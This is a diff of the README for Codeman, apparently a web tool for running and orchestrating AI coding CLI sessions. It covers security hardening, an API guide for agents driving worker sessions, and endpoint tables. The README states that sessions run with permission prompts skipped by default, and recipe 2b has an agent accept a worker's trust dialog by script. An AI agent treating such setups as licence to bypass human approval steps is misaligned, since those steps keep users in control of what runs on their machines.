||||
|----------|-------|------------|
|
||||
| **Discord** | Long-lived token, no confirmation, [repeatedly exploited](https://owasp.org/www-community/attacks/Qrljacking) | Codeman: single-use + TTL + notification |
|
||||
| **WhatsApp Web** | Phone confirms "Link device?", ~60s rotation | Comparable rotation; WhatsApp adds explicit confirmation (acceptable tradeoff for single-user) |
|
||||
| **Signal** | Ephemeral public key, E2E encrypted channel | Stronger crypto, but [exploited by Russian state actors in 2025](https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger) via social engineering despite it |
|
||||
| Platform | Model | Comparison |
|
||||
| ---------------- | ------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| **Discord** | Long-lived token, no confirmation, [repeatedly exploited](https://owasp.org/www-community/attacks/Qrljacking) | Codeman: single-use + TTL + notification |
|
||||
| **WhatsApp Web** | Phone confirms "Link device?", ~60s rotation | Comparable rotation; WhatsApp adds explicit confirmation (acceptable tradeoff for single-user) |
|
||||
| **Signal** | Ephemeral public key, E2E encrypted channel | Stronger crypto, but [exploited by Russian state actors in 2025](https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger) via social engineering despite it |
|
||||
|
||||
> Full design rationale, security analysis, and implementation details: [`docs/qr-auth-plan.md`](docs/qr-auth-plan.md)
|
||||
|
||||
@@ -428,27 +616,28 @@ When someone authenticates via QR, the desktop shows a notification toast with t
|
||||
|
||||
## Security
|
||||
|
||||
Codeman launches sessions with `--dangerously-skip-permissions`, so the web UI is by design a remote-code-execution surface for whoever can reach it — the whole security model exists to control *who* that is. Recent hardening (v0.9.0 + v0.9.5) closes the browser-driven attack paths that bite self-hosted dev tools. Full model: [`docs/security-architecture.md`](docs/security-architecture.md). **Found a vulnerability?** See [`SECURITY.md`](SECURITY.md) for private disclosure and the list of known limitations.
|
||||
By default Codeman launches sessions with `--dangerously-skip-permissions`, so the web UI is by design a remote-code-execution surface for whoever can reach it — the whole security model exists to control _who_ that is. (The startup permission mode is configurable; see below.) Recent hardening (v0.9.0 + v0.9.5) closes the browser-driven attack paths that bite self-hosted dev tools. Full model: [`docs/security-architecture.md`](docs/security-architecture.md). **Found a vulnerability?** See [`SECURITY.md`](.github/SECURITY.md) for private disclosure and the list of known limitations.
|
||||
|
||||
### Network & access
|
||||
|
||||
- **Loopback by default** — binds `127.0.0.1`, reachable only from the same machine, so the no-password default is safe out of the box. Binding a non-loopback host without `CODEMAN_PASSWORD` *starts but prints a loud warning* with three concrete fixes (set a password, loopback + an authenticated tunnel, or explicitly acknowledge with `--allow-unauthenticated-network`)
|
||||
- **Loopback by default** — the server binary binds `127.0.0.1`, reachable only from the same machine, so the no-password default is safe out of the box (the guided installer asks about network access and configures the binding + password for you). Binding a non-loopback host without `CODEMAN_PASSWORD` _starts but prints a loud warning_ with three concrete fixes (set a password, loopback + an authenticated tunnel, or explicitly acknowledge with `--allow-unauthenticated-network`)
|
||||
- **Optional auth, real sessions** — HTTP Basic via `CODEMAN_USERNAME` (default `admin`) / `CODEMAN_PASSWORD`. Success issues an opaque 256-bit `codeman_session` cookie (`randomBytes(32)`) — validated server-side, not client-signed, so it can't be forged offline (24h TTL, auto-extend, device-context audit log)
|
||||
- **Per-IP rate limiting** — 10 failed attempts → `429` with `Retry-After` (15-min decay). A valid cookie or correct password recovers *immediately* even while an attacker hammers the same IP — important because all tunnel traffic shares one loopback IP. QR auth has its own separate limiter
|
||||
- **Per-IP rate limiting** — 10 failed attempts → `429` with `Retry-After` (15-min decay). A valid cookie or correct password recovers _immediately_ even while an attacker hammers the same IP — important because all tunnel traffic shares one loopback IP. QR auth has its own separate limiter
|
||||
- **Configurable permission mode** - `--dangerously-skip-permissions` is only the default. **App Settings → Agents & CLIs → Claude → Startup Mode** can switch new sessions to Anthropic's classifier-guarded `auto` mode (low-prompt, needs Claude Code 2.1.207+), `normal` prompting, or an explicit allowed-tools list. In multi-user mode, non-granted users are forced to `auto`, and shell sessions / skip-permissions require an explicit per-user grant
|
||||
|
||||
### Always-on browser hardening (v0.9.5)
|
||||
|
||||
These run for **every** request — before auth, even on the default no-password loopback install:
|
||||
|
||||
- **Host-header allowlist → blocks DNS rebinding.** A custom domain rebound to `127.0.0.1` is rejected with `403 host not allowed` before any handler runs. Allowed: `localhost`, any IP literal, the bind host, `.ts.net` / `.trycloudflare.com` / `.cfargotunnel.com`, the active managed tunnel, and `CODEMAN_ALLOWED_HOSTS` (add custom reverse-proxy domains here — comma-separated; exact host or leading-dot `.suffix` for subdomains)
|
||||
- **Cross-site Origin / CSRF guard.** On state-changing methods (`POST`/`PUT`/`PATCH`/`DELETE`) the `Origin` must pass the same allowlist, else `403 cross-site request blocked`. A *missing* Origin is allowed (so `curl`, the CLI, and Claude Code hooks keep working); only a present-but-foreign or opaque `null` origin is rejected
|
||||
- **Cross-site Origin / CSRF guard.** On state-changing methods (`POST`/`PUT`/`PATCH`/`DELETE`) the `Origin` must pass the same allowlist, else `403 cross-site request blocked`. A _missing_ Origin is allowed (so `curl`, the CLI, and Claude Code hooks keep working); only a present-but-foreign or opaque `null` origin is rejected
|
||||
- **Raw `text/plain` bodies.** The global parser no longer JSON-parses `text/plain`, closing the CORS "simple request" CSRF vector where a cross-site `fetch` could smuggle JSON into a write route with no preflight
|
||||
- **WebSocket origin validation.** The terminal WS upgrade runs the same Host + Origin check and closes with code `4003` on failure (anti-CSWSH)
|
||||
- **XSS-escaped agent output.** AI-derived strings (tool names, command arguments, subagent descriptions) are HTML-escaped at every injection site before rendering in the subagent / activity panels
|
||||
|
||||
### Input, files & headers
|
||||
|
||||
- **Schema-validated inputs** — every API body is checked with Zod v4 schemas; a `CLAUDE_CODE_*` / `OPENCODE_*` / `CODEX_*` env-prefix allowlist gates which settings each CLI can receive
|
||||
- **Schema-validated inputs** — every API body is checked with Zod v4 schemas; a `CLAUDE_CODE_*` / `OPENCODE_*` / `CODEX_*` / `ANTIGRAVITY_*` / `GEMINI_*` / `GOOGLE_*` env-prefix allowlist gates which settings each CLI can receive
|
||||
- **Path containment** — file routes `realpath` before boundary checks (no TOCTOU); `..`, absolute paths, and symlinks resolving outside the working dir are rejected. Caps: 10 MB text preview / 50 MB raw & download; `/api/download` blocklists sensitive paths (`.env`, `*credentials*`, `~/.ssh/`, `.aws/credentials`). SVG/HTML is served `octet-stream` + `nosniff` + attachment so it downloads rather than executes
|
||||
- **Security headers** — `Content-Security-Policy` (`default-src 'self'`, every exception enumerated), `X-Content-Type-Options: nosniff`, `X-Frame-Options: SAMEORIGIN`, HSTS over HTTPS, and CORS reflected **only** for `localhost` / `127.0.0.1` / `::1`
|
||||
|
||||
@@ -479,74 +668,242 @@ Single-digit selection (1-9), color-coded status, token counts, auto-refresh. De
|
||||
|
||||
> Ctrl bindings also accept Cmd on macOS.
|
||||
|
||||
| Shortcut | Action |
|
||||
|----------|--------|
|
||||
| `Ctrl/Cmd+W` | Kill active session |
|
||||
| `Ctrl/Cmd+Tab` | Next session |
|
||||
| `Alt/Option+[` / `Alt/Option+]` | Previous / next session |
|
||||
| `Alt/Option+1`-`Alt/Option+9` | Switch to tab N (physical keys, so macOS Option layouts work) |
|
||||
| `Ctrl+Shift+{` / `Ctrl+Shift+}` | Move active tab left / right |
|
||||
| `Ctrl/Cmd+L` | Clear terminal |
|
||||
| `Ctrl+Shift+R` | Restore terminal size |
|
||||
| `Ctrl+Shift+V` | Toggle voice input |
|
||||
| `Ctrl/Cmd +` / `-` | Font size |
|
||||
| `Ctrl/Cmd+?` | Keyboard help |
|
||||
| `Shift+Enter` | Insert newline (sent to terminal) |
|
||||
| `Escape` | Close panels & modals |
|
||||
| Shortcut | Action |
|
||||
| ------------------------------- | ------------------------------------------------------------- |
|
||||
| `Ctrl/Cmd+W` | Kill active session |
|
||||
| `Ctrl/Cmd/Option+K` | Find open session or start a new one |
|
||||
| `Ctrl/Cmd+Tab` | Next session |
|
||||
| `Alt/Option+[` / `Alt/Option+]` | Previous / next session |
|
||||
| `Alt/Option+1`-`Alt/Option+9` | Switch to tab N (physical keys, so macOS Option layouts work) |
|
||||
| `Ctrl+Shift+{` / `Ctrl+Shift+}` | Move active tab left / right |
|
||||
| `Ctrl/Cmd+C` | Copy selection, or interrupt when nothing is selected |
|
||||
| `Ctrl+Shift+C` | Copy selection (never interrupts) |
|
||||
| `Ctrl/Cmd+L` | Clear terminal |
|
||||
| `Ctrl+Shift+R` | Restore terminal size |
|
||||
| `Ctrl+Shift+V` | Toggle voice input |
|
||||
| `Ctrl/Cmd +` / `-` | Font size |
|
||||
| `Ctrl/Cmd+?` | Keyboard help |
|
||||
| `Shift+Enter` | Insert newline (sent to terminal) |
|
||||
| `Escape` | Close panels & modals |
|
||||
|
||||
---
|
||||
|
||||
## Driving Codeman from an Agent — Programmatic Guide
|
||||
|
||||
For AI agents and automation that control Codeman without a browser: an agent that spins up worker sessions, a CI bot, or **Claude Code running _inside_ a Codeman session orchestrating other sessions**. Everything the UI does is HTTP + a CLI, so an agent can do it too.
|
||||
|
||||
> **Shortcut: install the packaged agent skill.** Everything below (plus worked multi-worker recipes) ships as a Claude Code skill in [`skills/codeman`](skills/codeman/SKILL.md), so an agent inside a session can drive Codeman without you pasting docs into the prompt. Three ways to get it:
|
||||
>
|
||||
> - `npx skills add Ark0N/Codeman --skill codeman -g`: global, works for any skills-aware agent
|
||||
> - `codeman skill install` (global) or `codeman skill install --case <name>`: for npm installs that never cloned the repo; `codeman skill uninstall` reverses it
|
||||
> - **App Settings → Agents & CLIs → Claude → Agent Skill** (`agentSkillEnabled`, default off): Codeman then injects the skill into each case on Claude session create; a user-authored `skills/codeman` in the case is never overwritten
|
||||
>
|
||||
> A global install (`codeman skill install`, or `npx skills add`) is picked up by **every new Claude Code session on the machine**, inside Codeman or not. The skill self-gates: outside a Codeman session (`CODEMAN_MUX` unset) it refuses to act, so a global install costs an idle session nothing.
|
||||
>
|
||||
> ⚠️ Turning `agentSkillEnabled` back off **does not remove already-injected copies** (a create-time sweep would yank the skill out from under other live sessions sharing that `.claude/` dir). Remove them per case with `codeman skill uninstall --case <name>`.
|
||||
|
||||
|
||||
|
||||
### Detect that you're inside Codeman
|
||||
|
||||
When a CLI runs in a Codeman-managed session, these environment variables are set — read them instead of hardcoding anything:
|
||||
|
||||
| Variable | Meaning |
|
||||
| -------------------------- | ------------------------------------------------------------------------------------------------------------------------------------ |
|
||||
| `CODEMAN_MUX=1` | You're in a managed tmux session. **Never** `tmux kill-session` / `pkill claude` / `pkill tmux` — you'll kill yourself or a sibling. |
|
||||
| `CODEMAN_API_URL` | Base URL of the API (e.g. `https://127.0.0.1:3000`). Use it for every call below. |
|
||||
| `CODEMAN_SESSION_ID` | _Your own_ session id. Use it to avoid acting on yourself. |
|
||||
| `CODEMAN_HOOK_SECRET_FILE` | Path to the hook secret (required on `/api/hook-event` while a managed tunnel is up). |
|
||||
|
||||
### Rules of the road (read before you POST)
|
||||
|
||||
1. **Single-line input, ending in `\r`.** Programmatic input is sent as literal text, and Enter fires **only when the input contains a carriage return**: `{"input":"run tests\r"}`. Without the `\r` the text sits on the session's prompt unsubmitted (and a combined `wait` runs its full timeout on a turn that never started). Embedded newlines are stripped rather than rejected, so `"echo A\necho B\r"` runs the joined command `echo Aecho B`: send one line per call.
|
||||
2. **Make input idempotent.** Include a stable `clientId` and a monotonic per-session `seq` on `POST …/input`. The server de-duplicates, so a retry after a dropped connection can't double-deliver a prompt.
|
||||
3. **Auth.** If `CODEMAN_PASSWORD` is set, send HTTP Basic auth (user `admin` or `CODEMAN_USERNAME`) or a `codeman_session` cookie. The default loopback install is passwordless. A missing `Origin` header is allowed, so plain `curl` works; cross-site browser origins are rejected (CSRF guard). ⚠️ A `401` replies with the bare string `Unauthorized`, **not** the JSON envelope, so piping it into `jq` throws a parse error instead of showing the failure: check the status before parsing.
|
||||
4. **Response envelope.** Most endpoints return `{ "success": true, "data": … }` (errors: `{ "success": false, "error", "errorCode" }`). A few legacy GETs return bare bodies — **handle both** (`body.data ?? body`).
|
||||
5. **`/api/v1/*`** is a stable alias of `/api/*`.
|
||||
6. **Wait instead of polling, and don't treat a timeout as an error.** The wait endpoints answer with HTTP `200` and `wait.timedOut: true` when nothing happened in time, so loop over short waits (60s is the default) rather than issuing one long call, because tunnels cut idle connections. `wait.timeoutMs` tells you the timeout the server actually applied after clamping (600s ceiling).
|
||||
7. **Only `claude` sessions emit `stop` and `blocked`.** Those two come from Claude Code hooks; `shell` and the external CLIs (opencode/codex/gemini/antigravity) accept only `idle`, `working` and `exit`. Asking for `stop` explicitly on those is a `400`; omitting `until` is always safe. ⚠️ On a `shell` session `idle` fires **once**, at startup, and never again, so send-and-wait there can only time out; synchronize hook-less sessions with a `wait-output` marker.
|
||||
8. **Nothing reports "ready", so wait for it explicitly.** A new session answers `{"signal":"exit","immediate":true}` (that means *not started*, not *crashed*) until its PID exists, and a `claude` worker in a fresh case then sits on the CLI's trust dialog. Prompt it there and the wait resolves on `idle` in ~2s looking exactly like a finished turn, while the text sits stuck in the dialog. Recipe 2b below is the sequence that avoids it.
|
||||
|
||||
### Recipes
|
||||
|
||||
```bash
|
||||
# CODEMAN_API_URL is auto-set inside every Codeman session, correct scheme included.
|
||||
# The fallback below fits a stock install; on a --https install set the https:// URL
|
||||
# yourself and add -k to each curl (self-signed cert).
|
||||
API="${CODEMAN_API_URL:-http://127.0.0.1:3000}"
|
||||
# (add -u admin:"$CODEMAN_PASSWORD" to each call if a password is set)
|
||||
|
||||
# 1. See what's running
|
||||
curl -s "$API/api/sessions" | jq '.data // .'
|
||||
|
||||
# 2. Spin up a worker session (a "case" = named working dir)
|
||||
curl -s -X POST "$API/api/quick-start" \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"caseName":"refactor-auth","mode":"claude","effort":"high"}' | jq
|
||||
|
||||
# 2b. Wait until that worker is actually READY (see rule 8): composer marker first,
|
||||
# first-run trust dialog only as the fallback. (Probing trust first and sending
|
||||
# a blind Enter misfires on re-runs: the dialog text stays in the buffer forever,
|
||||
# so the probe matches stale text and the Enter lands in a ready composer.)
|
||||
# Match single tokens: TUI text can reach the matcher without its spaces.
|
||||
until [ "$(curl -s "$API/api/sessions/$SID" | jq '.data.pid')" != null ]; do sleep 1; done
|
||||
R=$(curl -sG "$API/api/sessions/$SID/wait-output" --data-urlencode 'match=bypass' \
|
||||
--data-urlencode 'from=buffer' --data-urlencode 'timeout=5000')
|
||||
if ! jq -e '.data.wait.matched' <<<"$R" >/dev/null; then
|
||||
T=$(curl -sG "$API/api/sessions/$SID/wait-output" --data-urlencode 'match=trust' \
|
||||
--data-urlencode 'from=buffer' --data-urlencode 'timeout=2000')
|
||||
jq -e '.data.wait.matched' <<<"$T" >/dev/null && \
|
||||
curl -s -X POST "$API/api/sessions/$SID/input" -H 'Content-Type: application/json' \
|
||||
-d '{"input":"\r","useMux":true}' # accept the first-run trust dialog
|
||||
curl -sG "$API/api/sessions/$SID/wait-output" --data-urlencode 'match=bypass' \
|
||||
--data-urlencode 'from=buffer' --data-urlencode 'timeout=45000' >/dev/null
|
||||
fi
|
||||
|
||||
# 3. Send a prompt into a session (exactly-once: clientId + seq)
|
||||
curl -s -X POST "$API/api/sessions/$SID/input" \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"input":"Run the test suite and summarize failures\r","useMux":true,"clientId":"agent-1","seq":1}'
|
||||
|
||||
# 4. Send a prompt and BLOCK until that turn is done (registers the wait before
|
||||
# writing, so it can't answer with the previous turn's idle state)
|
||||
curl -s -X POST "$API/api/sessions/$SID/input" \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"input":"Run the test suite and summarize failures\r","useMux":true,
|
||||
"clientId":"agent-1","seq":2,"wait":"stop,exit","waitTimeout":60000}' \
|
||||
| jq '.data.wait' # -> {"signal":"stop","timedOut":false,"waitedMs":41230,...}
|
||||
# (`stop` is the definitive end-of-turn hook. Adding `idle` makes it resolve on a
|
||||
# spinner pause too, and on anything that redraws a ❯ prompt — like a dialog.)
|
||||
|
||||
# 4b. Timed out? That's a 200, not a failure. Loop over short waits.
|
||||
curl -s "$API/api/sessions/$SID/wait?until=stop,exit&timeout=60000" | jq '.data.wait'
|
||||
|
||||
# 4c. Or wait for a marker in the output (works for shell sessions too).
|
||||
# ⚠️ Unique per call (tmux repaints replay old screen text), and SPLIT so the
|
||||
# typed line never contains it: your own keystrokes echo into the output
|
||||
# stream, so an unsplit marker matches before the command has run. from=buffer
|
||||
# catches a marker that printed before the wait landed.
|
||||
N=$RANDOM
|
||||
curl -s -X POST "$API/api/sessions/$SID/input" -H 'Content-Type: application/json' \
|
||||
-d "{\"input\":\"M=DONE; npm test; echo \${M}_$N rc=\$?\r\",\"useMux\":true}"
|
||||
curl -sG "$API/api/sessions/$SID/wait-output" \
|
||||
--data-urlencode "match=DONE_$N" --data-urlencode 'from=buffer' \
|
||||
--data-urlencode 'timeout=60000' | jq '.data.wait'
|
||||
|
||||
# 5. Read the terminal back. ⚠️ Use terminal?tail=, NOT /output: the latter's
|
||||
# textOutput is empty for every tmux-backed (i.e. every interactive) session.
|
||||
# tail counts BYTES, and what comes back is terminal data, ANSI included.
|
||||
curl -s "$API/api/sessions/$SID/terminal?tail=8000" | jq -r '.data.terminalBuffer'
|
||||
|
||||
# 6. Stream live events (session output, agent activity, status)
|
||||
curl -sN "$API/api/events" # Server-Sent Events
|
||||
|
||||
# 7. Schedule recurring work (cron-style job)
|
||||
curl -s -X POST "$API/api/cron/jobs" \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"name":"nightly-deps","agentType":"claude","workingDir":"/home/me/proj",
|
||||
"promptMode":"inline_text","promptText":"Update dependencies and open a PR",
|
||||
"inputMode":"typed","scheduleType":"daily","dailyTime":"03:00",
|
||||
"enabled":true,"concurrencyPolicy":"warn_only"}' | jq
|
||||
|
||||
# 8. Inspect background sub-agents and their transcripts
|
||||
curl -s "$API/api/subagents" | jq '.data // .'
|
||||
curl -s "$API/api/subagents/$AID/transcript" | jq -r '.data // .'
|
||||
|
||||
# 9. Whole-system snapshot (sessions, settings, respawn, stats)
|
||||
curl -s "$API/api/status" | jq
|
||||
```
|
||||
|
||||
### Or use the bundled CLI
|
||||
|
||||
The same operations are available as commands (`codeman <cmd>`, aliases in parentheses) — handy from a shell tool inside a session:
|
||||
|
||||
```bash
|
||||
codeman session start -d /path/to/repo # (s) start a session
|
||||
codeman session list # list sessions
|
||||
codeman session logs <id> # tail output
|
||||
codeman task add "fix the failing test" # (t) queue a task
|
||||
codeman attach <path> # attach a Claude hook context
|
||||
```
|
||||
|
||||
### Hooks (events flowing _back_ to Codeman)
|
||||
|
||||
Codeman registers Claude Code hooks that `POST /api/hook-event` (`permission_prompt`, `idle_prompt`, `stop`, `task_completed`, …) so the dashboard reacts in real time. This endpoint is auth-exempt on loopback but, under a managed tunnel, requires the `X-Codeman-Hook-Secret` header (read it from `$CODEMAN_HOOK_SECRET_FILE`). You normally don't call this by hand — Codeman wires it up — but it's how the autonomy layers "see" what the agent is doing.
|
||||
|
||||
> Full endpoint list and request/response shapes follow.
|
||||
|
||||
---
|
||||
|
||||
## API
|
||||
|
||||
REST over Fastify — **~140 handlers across 15 route modules**, plus an SSE stream and a WebSocket terminal channel. A representative subset:
|
||||
REST over Fastify — **~200 handlers across 21 route modules**, plus an SSE stream and a WebSocket terminal channel. All responses use the `ApiResponse<T>` envelope (`{success, data}` / `{success, error, errorCode}`); `/api/v1/*` is a stable alias. A representative subset:
|
||||
|
||||
### Sessions
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | `/api/sessions` | List all |
|
||||
| `POST` | `/api/quick-start` | Create case + start session |
|
||||
| `DELETE` | `/api/sessions/:id` | Delete session |
|
||||
| `POST` | `/api/sessions/:id/input` | Send input |
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
| -------- | -------------------------- | ---------------------------------------------------------------------------------- |
|
||||
| `GET` | `/api/sessions` | List all |
|
||||
| `POST` | `/api/quick-start` | Create case + start session (`{caseName?, mode?, effort?, envOverrides?}`) |
|
||||
| `POST` | `/api/sessions/:id/input` | Send input (`{input, useMux?, clientId?, seq?, wait?, waitTimeout?}`: `clientId`+`seq` = exactly-once; `wait` blocks until the turn ends) |
|
||||
| `GET` | `/api/sessions/:id/terminal` | Read terminal output (`?tail=<bytes>`, `?full=1`); the read path for interactive sessions |
|
||||
| `GET` | `/api/sessions/:id/output` | Parsed one-shot output (`textOutput` is empty for tmux-backed sessions) |
|
||||
| `GET` | `/api/sessions/:id/wait` | Block until a signal fires (`?until=stop,idle,exit&timeout=&fresh=`); a timeout is a `200` |
|
||||
| `GET` | `/api/sessions/:id/wait-output` | Block until a literal string appears (`?match=&nocase=&from=now\|buffer&timeout=`) |
|
||||
| `GET` | `/api/sessions/unified` | Unified live + history list (Session Manager) — `?q=&limit=` |
|
||||
| `POST` | `/api/sessions/:id/pin` | Pin/unpin in the Session Manager (`{pinned}`) |
|
||||
| `PUT` | `/api/session-order` | Sync tab order across devices (`{order: [ids]}`) |
|
||||
| `DELETE` | `/api/sessions/:id` | Delete session |
|
||||
|
||||
### Respawn
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `POST` | `/api/sessions/:id/respawn/enable` | Enable with config + timer |
|
||||
| `POST` | `/api/sessions/:id/respawn/stop` | Stop controller |
|
||||
| `PUT` | `/api/sessions/:id/respawn/config` | Update config |
|
||||
|
||||
### Ralph / Todo
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | `/api/sessions/:id/ralph-state` | Get loop state + todos |
|
||||
| `POST` | `/api/sessions/:id/ralph-config` | Configure tracking |
|
||||
| Method | Endpoint | Description |
|
||||
| ------ | ---------------------------------- | -------------------------- |
|
||||
| `POST` | `/api/sessions/:id/respawn/enable` | Enable with config + timer |
|
||||
| `POST` | `/api/sessions/:id/respawn/stop` | Stop controller |
|
||||
| `PUT` | `/api/sessions/:id/respawn/config` | Update config |
|
||||
|
||||
### Orchestrator
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `POST` | `/api/orchestrator/start` | Start orchestration from a goal |
|
||||
| `POST` | `/api/orchestrator/approve` | Approve the generated plan |
|
||||
| `GET` | `/api/orchestrator/status` | Current phase + progress |
|
||||
| `POST` | `/api/orchestrator/stop` | Stop and clean up |
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
| ------ | --------------------------- | ------------------------------- |
|
||||
| `POST` | `/api/orchestrator/start` | Start orchestration from a goal |
|
||||
| `POST` | `/api/orchestrator/approve` | Approve the generated plan |
|
||||
| `GET` | `/api/orchestrator/status` | Current phase + progress |
|
||||
| `POST` | `/api/orchestrator/stop` | Stop and clean up |
|
||||
|
||||
### Cron (scheduled jobs)
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
| ---------------- | ---------------------------- | ----------------------- |
|
||||
| `GET` / `POST` | `/api/cron/jobs` | List / create cron jobs |
|
||||
| `PUT` / `DELETE` | `/api/cron/jobs/:id` | Update / delete a job |
|
||||
| `PUT` | `/api/cron/jobs/:id/enabled` | Enable / disable |
|
||||
| `POST` | `/api/cron/jobs/:id/run` | Run now |
|
||||
| `GET` | `/api/cron/jobs/:id/runs` | Run history |
|
||||
|
||||
### Subagents
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | `/api/subagents` | List all background agents |
|
||||
| `GET` | `/api/subagents/:id` | Agent info and status |
|
||||
| `GET` | `/api/subagents/:id/transcript` | Full activity transcript |
|
||||
| `DELETE` | `/api/subagents/:id` | Kill agent process |
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
| -------- | ------------------------------- | -------------------------- |
|
||||
| `GET` | `/api/subagents` | List all background agents |
|
||||
| `GET` | `/api/subagents/:id` | Agent info and status |
|
||||
| `GET` | `/api/subagents/:id/transcript` | Full activity transcript |
|
||||
| `DELETE` | `/api/subagents/:id` | Kill agent process |
|
||||
|
||||
### System
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | `/api/events` | SSE stream |
|
||||
| `GET` | `/api/status` | Full app state |
|
||||
| `POST` | `/api/hook-event` | Hook callbacks |
|
||||
| `GET` | `/api/system/update/check` | Check for a new release |
|
||||
| `POST` | `/api/system/update` | Self-update (git-clone installs) |
|
||||
| `POST` | `/api/clipboard` | Push text to all connected browsers (`{text}`) |
|
||||
| `GET` | `/api/sessions/:id/run-summary` | Timeline + stats |
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
| ------ | ------------------------------- | ---------------------------------------------- |
|
||||
| `GET` | `/api/events` | SSE stream |
|
||||
| `GET` | `/api/status` | Full app state |
|
||||
| `POST` | `/api/hook-event` | Hook callbacks |
|
||||
| `GET` | `/api/system/update/check` | Check for a new release |
|
||||
| `POST` | `/api/system/update` | Self-update (git-clone installs) |
|
||||
| `POST` | `/api/clipboard` | Push text to all connected browsers (`{text}`) |
|
||||
| `GET` | `/api/sessions/:id/run-summary` | Timeline + stats |
|
||||
|
||||
> **Building something on top of Codeman?** [`docs/extending-codeman.md`](docs/extending-codeman.md) is the integration guide: render your own UI as a tab, subscribe to the SSE event stream to react when an agent needs you, drive Codeman from a script, and the traps worth knowing before you start. Codeman has no plugin runtime on purpose, so an integration is just your own process talking HTTP.
|
||||
|
||||
---
|
||||
|
||||
@@ -570,7 +927,6 @@ flowchart TB
|
||||
end
|
||||
|
||||
subgraph Detection["Detection Layer"]
|
||||
RT["Ralph Tracker"]
|
||||
SW["Subagent Watcher<br/><small>~/.claude/projects/*/subagents</small>"]
|
||||
TW["Team Watcher<br/><small>~/.claude/teams/*</small>"]
|
||||
end
|
||||
@@ -581,7 +937,7 @@ flowchart TB
|
||||
end
|
||||
|
||||
subgraph External["External"]
|
||||
CLI["AI CLI<br/><small>Claude Code / OpenCode / Codex</small>"]
|
||||
CLI["AI CLI<br/><small>Claude Code / OpenCode / Codex / Antigravity / Gemini</small>"]
|
||||
BG["Background Agents<br/><small>(Task tool)</small>"]
|
||||
end
|
||||
end
|
||||
@@ -594,7 +950,6 @@ flowchart TB
|
||||
SM --> RC
|
||||
SM --> ORC
|
||||
SM --> SS
|
||||
S1 --> RT
|
||||
S1 --> SCR
|
||||
S2 --> SCR
|
||||
RC --> SCR
|
||||
@@ -613,7 +968,7 @@ flowchart TB
|
||||
npm install
|
||||
npx tsx src/index.ts web # Dev mode
|
||||
npm run build # Production build
|
||||
npm test # Run tests
|
||||
npm run test:ci # Run tests (the CI suite; browser suites need extra setup)
|
||||
```
|
||||
|
||||
See [CLAUDE.md](./CLAUDE.md) for full documentation.
|
||||
@@ -624,14 +979,14 @@ See [CLAUDE.md](./CLAUDE.md) for full documentation.
|
||||
|
||||
The codebase went through a comprehensive 7-phase refactoring that eliminated god objects, centralized configuration, and established modular architecture:
|
||||
|
||||
| Phase | What changed | Impact |
|
||||
|-------|-------------|--------|
|
||||
| **Performance** | Cached endpoints, SSE adaptive batching, buffer chunking | Sub-16ms terminal latency |
|
||||
| **Route extraction** | `server.ts` split into 15 domain route modules + auth middleware + port interfaces | **−67%** server.ts LOC (6,736 → 2,254) |
|
||||
| **Domain splitting** | `types.ts` → 16 domain files, `ralph-tracker` → 7 files, `respawn-controller` → 5 files, `session` → 6 files | No more god files |
|
||||
| **Frontend modules** | `app.js` → 18 extracted modules across infra, domain & feature layers | app.js core down to **~3.4K LOC** |
|
||||
| **Config consolidation** | ~70 scattered magic numbers → 10 domain-focused config files | Zero cross-file duplicates |
|
||||
| **Test infrastructure** | Shared mock library, 12 route test files, consolidated MockSession | Testable route handlers via `app.inject()` |
|
||||
| Phase | What changed | Impact |
|
||||
| ------------------------ | ------------------------------------------------------------------------------------------------------------ | ------------------------------------------ |
|
||||
| **Performance** | Cached endpoints, SSE adaptive batching, buffer chunking | Sub-16ms terminal latency |
|
||||
| **Route extraction** | `server.ts` split into 15 domain route modules + auth middleware + port interfaces | **−67%** server.ts LOC (6,736 → 2,254) |
|
||||
| **Domain splitting** | `types.ts` → 16 domain files, `ralph-tracker` → 7 files, `respawn-controller` → 5 files, `session` → 6 files | No more god files |
|
||||
| **Frontend modules** | `app.js` → 18 extracted modules across infra, domain & feature layers | app.js core down to **~3.4K LOC** |
|
||||
| **Config consolidation** | ~70 scattered magic numbers → 10 domain-focused config files | Zero cross-file duplicates |
|
||||
| **Test infrastructure** | Shared mock library, 12 route test files, consolidated MockSession | Testable route handlers via `app.inject()` |
|
||||
|
||||
Full details: [`docs/archive/code-structure-findings.md`](docs/archive/code-structure-findings.md)
|
||||
|
||||
@@ -643,7 +998,7 @@ Full details: [`docs/archive/code-structure-findings.md`](docs/archive/code-stru
|
||||
|
||||
[](https://www.npmjs.com/package/xterm-zerolag-input)
|
||||
|
||||
Instant keystroke feedback overlay for xterm.js. Eliminates perceived input latency over high-RTT connections by rendering typed characters immediately as a pixel-perfect DOM overlay. Zero dependencies, configurable prompt detection, full state machine with 78 tests.
|
||||
Instant keystroke feedback overlay for xterm.js. Eliminates perceived input latency over high-RTT connections by rendering typed characters immediately as a pixel-perfect DOM overlay. Zero dependencies, 6.1 kB gzipped, configurable prompt detection, CJK/emoji wide-character support, full state machine with 175 tests.
|
||||
|
||||
```bash
|
||||
npm install xterm-zerolag-input
|
||||
@@ -670,3 +1025,8 @@ MIT — see [LICENSE](LICENSE)
|
||||
<p align="center">
|
||||
<strong>Track sessions. Visualize agents. Control respawn. Let it run while you sleep.</strong>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
